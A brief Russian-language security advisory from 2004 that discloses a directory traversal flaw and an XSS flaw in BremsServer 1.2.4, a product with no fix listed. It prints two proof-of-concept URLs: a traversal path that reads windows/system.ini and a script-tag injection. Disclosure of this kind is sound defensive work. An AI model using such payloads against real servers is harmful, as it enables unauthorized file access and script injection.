Security Lab

Межсайтовый скриптинг и просмотр произвольных файлов в BremsServer

Дата публикации:29.01.2004
Всего просмотров:975
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Der Herberlin BremsServer 1.x
Уязвимые версии: BremsServer 1.2.4

Описание: Уязвимость обнаружена в BremsServer. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также выполнить XSS нападение.

1. http://[target]/../PATH/windows/system.ini

2.

http://[target]/<script>alert("Test")</script>

URL производителя: http://www.herberlin.de/bremsserver.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Directory traversal and XSS in BremsServer 1.2.4